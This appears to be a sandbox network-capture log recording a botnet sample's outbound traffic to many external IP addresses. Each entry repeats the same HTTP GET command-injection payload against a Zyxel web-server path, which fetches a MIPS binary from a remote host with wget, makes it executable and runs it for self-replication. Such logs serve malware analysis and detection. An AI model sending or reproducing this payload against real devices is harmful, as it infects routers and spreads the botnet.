                                    Jan 13, 2024 19:02:35.207204103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4615192.168.2.1360534173.59.170.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.207214117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4616192.168.2.134502457.247.208.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.207302094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4617192.168.2.134912643.0.106.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.207350969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4618192.168.2.133587893.8.94.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.207397938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4619192.168.2.1341794190.201.183.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.207468033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4620192.168.2.135483424.182.155.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.207530975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4621192.168.2.134587882.234.227.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.207616091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4622192.168.2.135174664.23.57.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.207662106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4623192.168.2.1357440159.168.87.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.207727909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4624192.168.2.1350776137.50.179.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.207794905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4625192.168.2.133792288.1.219.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.207875013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4626192.168.2.1349368200.237.89.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.207937002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4627192.168.2.135178447.67.102.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.208025932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4628192.168.2.1357594109.164.9.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.208064079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4629192.168.2.1345790101.207.52.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.208157063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4630192.168.2.1347850172.113.71.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.208170891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4631192.168.2.136062087.12.238.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.208266973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4632192.168.2.1351020161.45.230.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.208333015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4633192.168.2.1349656138.169.83.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.208389044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4634192.168.2.134086251.160.51.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.208419085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4635192.168.2.134613213.91.198.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.208493948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4636192.168.2.134629217.107.165.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.208549976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4637192.168.2.134790413.150.88.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.208610058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4638192.168.2.1334878115.55.100.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.208668947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4639192.168.2.1344050112.150.72.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.208724022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4640192.168.2.136091278.246.63.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.208772898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4641192.168.2.134382075.164.235.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.208826065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4642192.168.2.134207877.82.146.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.208875895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4643192.168.2.1345132163.206.238.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.208911896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4644192.168.2.1344972212.141.9.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.208982944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4645192.168.2.1348698148.79.16.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.209052086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4646192.168.2.135923823.41.68.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.209111929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4647192.168.2.1337604220.94.127.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.209172010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4648192.168.2.134828292.56.106.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.209248066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4649192.168.2.1358934152.142.239.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.209292889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4650192.168.2.1339560110.39.200.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.209347010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4651192.168.2.1342506134.51.72.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.209409952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4652192.168.2.134673286.181.105.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.209453106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4653192.168.2.1343022146.183.82.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.209491014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4654192.168.2.1335608182.141.219.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.209546089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4655192.168.2.1342106174.5.185.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.209590912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4656192.168.2.1340484103.64.134.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.209650993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4657192.168.2.134090250.129.71.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.209691048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4658192.168.2.1349652184.198.126.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.209765911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4659192.168.2.1335092108.255.171.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.209789038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4660192.168.2.1350936177.30.111.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.209851027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4661192.168.2.1356118163.18.15.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.209913969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4662192.168.2.1347130217.139.192.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.209974051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4663192.168.2.1337720175.189.162.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.210050106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4664192.168.2.135010012.98.240.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.210098982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4665192.168.2.1360888118.40.59.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.210135937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4666192.168.2.1340020120.247.126.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.210237980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4667192.168.2.1334876187.88.159.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.210308075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4668192.168.2.1356982164.75.62.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.210362911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4669192.168.2.1341208118.221.85.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.210423946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4670192.168.2.1356196173.166.24.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.210495949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4671192.168.2.134260871.197.134.150443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.210555077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4672192.168.2.1339590173.160.211.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.210608006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4673192.168.2.135822067.12.158.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.210681915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4674192.168.2.1357092169.39.164.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.210757971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4675192.168.2.1350582159.174.111.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.210817099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4676192.168.2.1336810162.103.146.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.210900068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4677192.168.2.134729075.112.81.60443
                                    TimestampBytes transferredDirectionData
